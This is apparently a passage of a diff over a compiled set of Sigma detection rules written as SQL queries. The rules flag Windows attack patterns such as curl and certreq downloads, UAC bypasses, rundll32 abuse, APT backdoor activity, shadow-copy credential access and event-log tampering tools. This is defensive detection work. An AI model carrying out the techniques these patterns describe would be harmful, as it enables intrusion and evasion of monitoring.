"filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using 
Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": 
"Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": 
"Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": 
"ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": 
"Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": 
"e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + 
"attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, 
oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' 